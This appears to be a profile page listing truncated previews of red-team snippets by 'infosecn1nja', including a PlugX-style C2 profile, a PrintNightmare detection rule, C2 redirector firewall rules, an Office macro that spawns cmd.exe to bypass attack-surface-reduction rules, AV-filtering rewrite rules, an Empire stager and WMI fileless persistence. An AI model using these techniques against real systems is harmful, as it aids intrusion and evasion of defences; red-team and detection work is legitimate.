infosecn1nja

#
# PlugX Profile
# Author: @infosecn1nja
#
# https://github.com/silence-is-best/c2db/blob/master/README.md

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter    "10"; # throw in a 10% jitter

stage {

infosecn1nja

<!--
  -  PrinterNightmare CVE-2021-34527 Exploit Detection
  -  Created by Rahmat Nurfauzi (@infosecn1nja).
  -  This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
-->
<group name="sysmon,">
<rule id="99948" level="15">
	<if_group>sysmon_event_11</if_group>
	<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
	<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>

infosecn1nja

#!/usr/bin/python
import argparse
import re, random
import string, os, os.path

def rand_num(min, max):
	return random.randrange(min, max)

def gen_str(size):
	return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))

infosecn1nja

Make a rule that allows port 80/443 access only from redirector:

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver

infosecn1nja

APT Group/Red Team Weaponization Phase
=======================================

C2 tools : 
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

infosecn1nja

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{
	
	public TestClass()
	{}

infosecn1nja

	RewriteEngine On
	
	# Uncomment the below line for verbose logging, including seeing which rule matched.
	#LogLevel alert rewrite:trace5
	
	# BURN AV BURN
	
	# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
	RewriteCond                             expr                                    "-R '54.0.0.0/8'" [OR]
        RewriteCond                             expr                                    "-R '52.0.0.0/8'" [OR]

infosecn1nja

from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'wmic_xsl_starfighters',

            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],

infosecn1nja

# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html

<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds.  The event will trigger only once.  
#>

$EventFilterName = "Fileless WMI Persistence SystemUptime"